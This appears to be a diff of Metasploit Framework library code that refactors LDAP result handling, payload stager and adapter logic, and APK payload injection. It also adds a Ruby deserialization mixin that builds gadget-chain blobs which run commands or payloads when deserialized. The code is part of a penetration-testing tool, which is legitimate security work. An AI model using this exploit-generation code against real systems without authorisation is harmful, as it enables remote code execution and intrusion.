+    #   as a 'extended_response' representing the extended response,
+    #   a 'code' with an integer representing the result code,
+    #   a 'error_message' containing an optional error message as a Net::BER::BerIdentifiedString,
+    #   a 'matched_dn' containing the matched DN,
+    #   and a 'message' containing the query result message.
    # @param filter [Net::LDAP::Filter]  A Net::LDAP::Filter to use to
    #   filter the results of the query.
    #
@@ -326,19 +358,19 @@ module Msf
    # @return [Nil] This function does not return any data.
    def validate_query_result!(query_result, filter)
      if query_result.class != Hash
-        raise ArgumentError.new('Parameter to "validate_query_result!" function was not a Hash!')
+        raise ArgumentError, 'Parameter to "validate_query_result!" function was not a Hash!'
      end

      # Codes taken from https://ldap.com/ldap-result-code-reference-core-ldapv3-result-codes
-      case query_result['resultCode']
+      case query_result[:code]
      when 0
        vprint_status("Successfully queried #{filter}.")
      when 1
        # This is unknown as whilst we could fail on lack of authorization, this is not guaranteed with this error code.
        # The user will need to inspect the error message to determine the root cause of the issue.
-        fail_with(Msf::Module::Failure::Unknown, "An LDAP operational error occurred on #{filter}. It is likely the client requires authorization! The error was: #{query_result['errorMessage'].strip}")
+        fail_with(Msf::Module::Failure::Unknown, "An LDAP operational error occurred on #{filter}. It is likely the client requires authorization! The error was: #{query_result[:error_message].strip}")
      when 2
-        fail_with(Msf::Module::Failure::BadConfig, "The LDAP protocol being used by Metasploit isn't supported. The error was #{query_result['errorMessage'].strip}")
+        fail_with(Msf::Module::Failure::BadConfig, "The LDAP protocol being used by Metasploit isn't supported. The error was #{query_result[:error_message].strip}")
      when 3
        fail_with(Msf::Module::Failure::TimeoutExpired, "The LDAP server returned a timeout response to the query #{filter}.")
      when 4
@@ -368,10 +400,10 @@ module Msf
      when 65
        fail_with(Msf::Module::Failure::Unknown, "The LDAP operation failed due to an object class violation when using #{filter}.")
      else
-        if query_result['errorMessage'].blank?
+        if query_result[:error_message].blank?
          fail_with(Msf::Module::Failure::Unknown, "Query #{filter} failed but no error message was returned!")
        else
-          fail_with(Msf::Module::Failure::Unknown, "Query #{filter} failed with error: #{query_result['errorMessage'].strip}")
+          fail_with(Msf::Module::Failure::Unknown, "Query #{filter} failed with error: #{query_result[:error_message].strip}")
        end
      end
    end
@@ -26,7 +26,7 @@ module Exploit::Remote::SMB::Client::Psexec
      [
        OptString.new('SERVICE_NAME', [ false, 'The service name', nil]),
        OptString.new('SERVICE_DISPLAY_NAME', [ false, 'The service display name', nil]),
-        OptString.new('SERVICE_DESCRIPTION', [false, "Service description to to be used on target for pretty listing",nil])
+        OptString.new('SERVICE_DESCRIPTION', [false, "Service description to be used on target for pretty listing",nil])
      ], self.class)

    register_advanced_options(
@@ -0,0 +1,54 @@
+# -*- coding: binary -*-
+
+# Ruby deserialization mixin
+module Msf
+  # Ruby deserialization exploit module
+  module Exploit::RubyDeserialization
+    include Msf::Exploit::Powershell
+
+    # Generate a binary blob that when deserialized by Ruby will execute the specified command using the platform-specific
+    # shell.
+    #
+    # @param [String] name The name of the payload to use.
+    # @param [String] command The OS command to execute.
+    #
+    # @return [String] The opaque data blob.
+    def generate_ruby_deserialization_for_command(command, name)
+      Msf::Util::RubyDeserialization.payload(name, command)
+    end
+
+    # Generate a binary blob that when deserialized by ruby will execute the specified payload. This routine converts the
+    # payload automatically based on the platform and architecture.
+    #
+    # @param [String] name The name of the payload to use.
+    # @param [Msf::EncodedPayload] payload The payload to execute.
+    #
+    # @raise [RuntimeError] This raises a RuntimeError of the specified payload can not be automatically converted to an
+    #   operating system command.
+    #
+    # @return [String] The opaque data blob.
+    def generate_ruby_deserialization_for_payload(payload, name)
+      command = nil
+
+      if payload.platform.platforms == [Msf::Module::Platform::Windows]
+        if [ Rex::Arch::ARCH_X86, Rex::Arch::ARCH_X64 ].include? payload.arch.first
+          command = cmd_psh_payload(payload.encoded, payload.arch.first, { remove_comspec: true })
+        elsif payload.arch.first == Rex::Arch::ARCH_CMD
+          command = payload.encoded
+        end
+      elsif payload.arch.first == Rex::Arch::ARCH_CMD
+        command = payload.encoded
+      end
+
+      if command.nil?
+        raise 'Could not generate the payload for the platform/architecture combination'
+      end
+
+      generate_ruby_deserialization_for_command(command, name)
+    end
+
+    def self.gadget_chains
+      Msf::Util::RubyDeserialization.payload_names
+    end
+  end
+end
@@ -22,7 +22,7 @@ module Msf::Module::HasActions
  def find_action(name)
    return nil if not name
    actions.each do |a|
-      return a if a.name == name
+      return a if a.name.downcase == name.downcase
    end
    return nil
  end
@@ -150,7 +150,15 @@ module Msf::Module::ModuleInfo
  # Merges the module description.
  #
  def merge_info_description(info, val)
-    merge_info_string(info, 'Description', val, ". ", true)
+    key = 'Description'
+    unless info[key]
+      info[key] = val
+      return
+    end
+
+    current_value = Msf::Serializer::ReadableText.word_wrap_description(info[key])
+    new_value = Msf::Serializer::ReadableText.word_wrap_description(val)
+    info[key] = current_value.end_with?('.') ? "#{current_value}\n#{val}" : "#{current_value}.\n\n#{new_value}"
  end

  #
@@ -62,15 +62,14 @@ class Payload < Msf::Module
    # If this is an adapted or staged payload but there is no stage information,
    # then this is actually a stager + single combination.  Set up the
    # information hash accordingly.
-    if (self.class.include?(Msf::Payload::Adapter) || self.class.include?(Msf::Payload::Single)) and
-      self.class.include?(Msf::Payload::Stager)
-      self.module_info['Stage'] = {}
+    if (self.class.include?(Msf::Payload::Adapter) || self.class.include?(Msf::Payload::Single)) and self.class.include?(Msf::Payload::Stager)

      if self.module_info['Payload']
        self.module_info['Stage']['Payload']  = self.module_info['Payload']['Payload'] || ""
        self.module_info['Stage']['Assembly'] = self.module_info['Payload']['Assembly'] || ""
        self.module_info['Stage']['Offsets']  = self.module_info['Payload']['Offsets'] || {}
-      else
+      elsif !self.module_info['Stage']
+        self.module_info['Stage'] = {}
        self.module_info['Stage']['Payload']  = ""
        self.module_info['Stage']['Assembly'] = ""
        self.module_info['Stage']['Offsets']  = {}
@@ -136,6 +135,8 @@ class Payload < Msf::Module
  #
  def payload_type_s
    case payload_type
+      when Type::Adapter
+        return "adapter"
      when Type::Stage
        return "stage"
      when Type::Stager
@@ -3,6 +3,15 @@ module Msf::Payload::Adapter
  # size can't be a single value and must be set to dynamic
  CachedSize = :dynamic

+  def initialize(info={})
+    super
+
+    if self.is_a?(Msf::Payload::Stager)
+      self.stage_arch = Rex::Transformer.transform(module_info['AdaptedArch'], Array, [ String ], 'AdaptedArch')
+      self.stage_platform = Msf::Module::PlatformList.transform(module_info['AdaptedPlatform'])
+    end
+  end
+
  def compatible?(mod)
    if mod.type == Msf::MODULE_PAYLOAD
      return false if Set.new([module_info['AdaptedArch']]) != mod.arch.to_set
@@ -240,10 +240,10 @@ class Msf::Payload::Apk
    check_apktool_output_for_exceptions(check_apktool)

    apk_v = Rex::Version.new(check_apktool.split("\n").first.strip)
-    unless apk_v >= Rex::Version.new('2.0.1')
-      raise RuntimeError, "apktool version #{apk_v} not supported, please download at least version 2.0.1."
+    unless apk_v >= Rex::Version.new('2.4.1')
+      raise RuntimeError, "apktool version #{apk_v} not supported, please download at least version 2.4.1."
    end
-    unless apk_v >= Rex::Version.new('2.5.1')
+    unless apk_v >= Rex::Version.new('2.7.0')
      print_warning("apktool version #{apk_v} is outdated and may fail to decompile some apk files. Update apktool to the latest version.")
    end

@@ -295,7 +295,7 @@ class Msf::Payload::Apk
    end

    print_status "Decompiling original APK..\n"
-    apktool_output = run_cmd(['apktool', 'd', "#{tempdir}/original.apk", '-o', "#{tempdir}/original"])
+    apktool_output = run_cmd(['apktool', 'd', "#{tempdir}/original.apk", '--only-main-classes', '-o', "#{tempdir}/original"])
    check_apktool_output_for_exceptions(apktool_output)

    print_status "Decompiling payload APK..\n"
@@ -8,9 +8,14 @@ module Msf::Payload::Stager

  include Msf::Payload::TransportConfig

+  attr_accessor :stage_arch
+  attr_accessor :stage_platform
+
  def initialize(info={})
    super

+    self.stage_arch = self.arch
+    self.stage_platform = self.platform
    register_advanced_options(
      [
        Msf::OptBool.new("EnableStageEncoding", [ false, "Encode the second stage payload", false ]),
@@ -288,7 +293,9 @@ module Msf::Payload::Stager
        'Encoder'            => stage_enc_mod,
        'EncoderOptions'     => { 'SaveRegisters' => saved_registers },
        'ForceSaveRegisters' => true,
-        'ForceEncode'        => true)
+        'ForceEncode'        => true,
+        'Arch'               => self.stage_arch,
+        'Platform'           => self.stage_platform)

      if encp.encoder
        if stage_enc_mod
@@ -180,12 +180,10 @@ module Msf
        def query_ldap(session_handle, base, scope, filter, fields)
          vprint_status('Searching LDAP directory')
          search = wldap32.ldap_search_sA(session_handle, base, scope, filter, nil, 0, 4)
-          vprint_status("search: #{search}")
-
          if search['return'] == LDAP_SIZELIMIT_EXCEEDED
            print_error('LDAP_SIZELIMIT_EXCEEDED, parsing what we retrieved, try increasing the MAX_SEARCH value [0:LDAP_NO_LIMIT]')
          elsif search['return'] != Error::SUCCESS
-            print_error('No results')
+            print_error("Search returned LDAP error #{search['return']} (#{ERROR_CODE_TO_CONSTANT.fetch(search['return'], 'Unknown')})")
            wldap32.ldap_msgfree(search['res'])
            return
          end
@@ -198,10 +196,7 @@ module Msf
            return
          end

-          print_status("Entries retrieved: #{search_count}")
-
-          pEntries = []
-          entry_results = []
+          vprint_status("Entries retrieved: #{search_count}")

          if datastore['MAX_SEARCH'] == 0
            max_search = search_count
@@ -209,138 +204,42 @@ module Msf
            max_search = [datastore['MAX_SEARCH'], search_count].min
          end

-          0.upto(max_search - 1) do |i|
-            if (i == 0)
-              pEntries[0] = wldap32.ldap_first_entry(session_handle, search['res'])['return']
-            end
-
-            if (pEntries[i] == 0)
-              print_error('Failed to get entry')
-              wldap32.ldap_msgfree(search['res'])
-              return
-            end
-
-            vprint_status("Entry #{i}: 0x#{pEntries[i].to_s(16)}")
-
-            entry = get_entry(pEntries[i])
-
-            # Entries are a linked list...
-            if client.arch == ARCH_X64
-              pEntries[i + 1] = entry[4]
-            else
-              pEntries[i + 1] = entry[3]
-            end
-
-            ber = get_ber(entry)
+          entry = wldap32.ldap_first_entry(session_handle, search['res'])['return']

+          entry_results = []
+          while entry != 0 && (entry_results.length < max_search)
            field_results = []
            fields.each do |field|
-              vprint_status("Field: #{field}")
-
-              values = get_values_from_ber(ber, field)
-
              values_result = ''
-              values_result = values.join(',') if values
-              vprint_status("Values #{values}")
+              values = wldap32.ldap_get_values(session_handle, entry, field)
+              if values['return'] != 0
+                count_values = wldap32.ldap_count_values(values['return'])
+                if count_values['return'] != 0
+                  if client.native_arch == ARCH_X64
+                    value_pointers = client.railgun.memread(values['return'], 8 * count_values['return']).unpack('Q*')
+                  else
+                    value_pointers = client.railgun.memread(values['return'], 4 * count_values['return']).unpack('V*')
+                  end
+                  values_result = value_pointers.map { |ptr| client.railgun.util.read_string(ptr) }.join(',')
+                end
+                wldap32.ldap_value_free(values['return'])
+              end

              field_results << { type: 'unknown', value: values_result }
            end

            entry_results << field_results
+            entry = wldap32.ldap_next_entry(session_handle, entry)['return']
          end

+          wldap32.ldap_msgfree(search['res'])
+
          return {
            fields: fields,
            results: entry_results
          }
        end

-        # Gets the LDAP Entry
-        #
-        # @param pEntry [Integer] Pointer to the Entry
-        # @return [Array] Entry data structure
-        def get_entry(pEntry)
-          unless session.commands.include?(Rex::Post::Meterpreter::Extensions::Stdapi::COMMAND_ID_STDAPI_RAILGUN_API)
-            raise "Session doesn't support Railgun!"
-          end
-
-          return client.railgun.memread(pEntry, 41).unpack('VVVVVVVVVvCCC')
-        end
-
-        # Get BER Element data structure from LDAPMessage
-        #
-        # @param msg [String] The LDAP Message from the server
-        # @return [String] The BER data structure
-        def get_ber(msg)
-          unless session.commands.include?(Rex::Post::Meterpreter::Extensions::Stdapi::COMMAND_ID_STDAPI_RAILGUN_API)
-            raise "Session doesn't support Railgun!"
-          end
-
-          ber = client.railgun.memread(msg[2], 60).unpack('V*')
-
-          # BER Pointer is different between x86 and x64
-          if client.arch == ARCH_X64
-            ber_data = client.railgun.memread(ber[4], ber[0])
-          else
-            ber_data = client.railgun.memread(ber[3], ber[0])
-          end
-
-          return ber_data
-        end
-
-        # Search through the BER data structure for our Attribute.
-        # This doesn't attempt to parse the BER structure correctly
-        # instead it finds the first occurance of our field name
-        # tries to check the length of that value.
-        #
-        # @param ber_data [String] BER data structure
-        # @param field [String] Attribute name
-        # @return [Array] Values for the given +field+
-        def get_values_from_ber(ber_data, field)
-          field_offset = ber_data.index(field)
-
-          unless field_offset
-            vprint_status("Field not found in BER: #{field}")
-            return nil
-          end
-
-          # Value starts after our field string
-          values_offset = field_offset + field.length
-          values_start_offset = values_offset + 8
-          values_len_offset = values_offset + 5
-          curr_len_offset = values_offset + 7
-
-          values_length = ber_data[values_len_offset].unpack('C')[0]
-          values_end_offset = values_start_offset + values_length
-
-          curr_length = ber_data[curr_len_offset].unpack('C')[0]
-          curr_start_offset = values_start_offset
-
-          if (curr_length >= 127)
-            curr_length = ber_data[curr_len_offset + 1, 4].unpack('N')[0]
-            curr_start_offset += 4
-          end
-
-          curr_end_offset = curr_start_offset + curr_length
-
-          values = []
-          while (curr_end_offset < values_end_offset)
-            values << ber_data[curr_start_offset..curr_end_offset]
-
-            break unless ber_data[curr_end_offset] == "\x04"
-
-            curr_len_offset = curr_end_offset + 1
-            curr_length = ber_data[curr_len_offset].unpack('C')[0]
-            curr_start_offset = curr_end_offset + 2
-            curr_end_offset = curr_end_offset + curr_length + 2
-          end
-
-          # Strip trailing 0 or \x04 which is used to delimit values
-          values.map! { |x| x[0..x.length - 2] }
-
-          return values
-        end
-
        # Shortcut to the WLDAP32 Railgun Object
        # @return [Object] wldap32
        def wldap32
@@ -365,10 +264,10 @@ module Msf
            raise "Unable to initialize ldap server: #{init_result['ErrorMessage']}"
          end

-          vprint_status("LDAP Handle: #{session_handle}")
+          vprint_status("LDAP Handle: 0x#{session_handle.to_s(16)}")

-          vprint_status('Setting Sizelimit Option')
-          wldap32.ldap_set_option(session_handle, LDAP_OPT_SIZELIMIT, size_limit)
+          vprint_status('Setting the size limit option')
+          wldap32.ldap_set_option(session_handle, LDAP_OPT_SIZELIMIT, [size_limit].pack('V'))

          vprint_status('Binding to LDAP server')
          bind_result = wldap32.ldap_bind_sA(session_handle, nil, nil, LDAP_AUTH_NEGOTIATE)
@@ -737,9 +737,7 @@ private
  end

  def _run_exploit(mod, opts)
-    if mod.datastore['PAYLOAD']
-      opts['PAYLOAD'] = mod.datastore['PAYLOAD']
-    else
+    if opts['PAYLOAD'].blank?
      opts['PAYLOAD'] = Msf::Payload.choose_payload(mod)
    end

@@ -67,7 +67,7 @@ module Msf::WebServices::LootServlet
        # Give the file a unique name to prevent accidental overwrites. Only do this if there is actually a file
        # on disk. If there is not a file on disk we assume that this DB record is for tracking a file outside
        # of metasploit, so we don't want to assign them a unique file name and overwrite that.
-        if opts[:path] && File.exists?(db_record.path)
+        if opts[:path] && File.exist?(db_record.path)
          filename = File.basename(opts[:path])
          opts[:path] = File.join(Msf::Config.loot_directory, "#{SecureRandom.hex(10)}-#{filename}")
        end
--- a/Show More
+++ b/Show More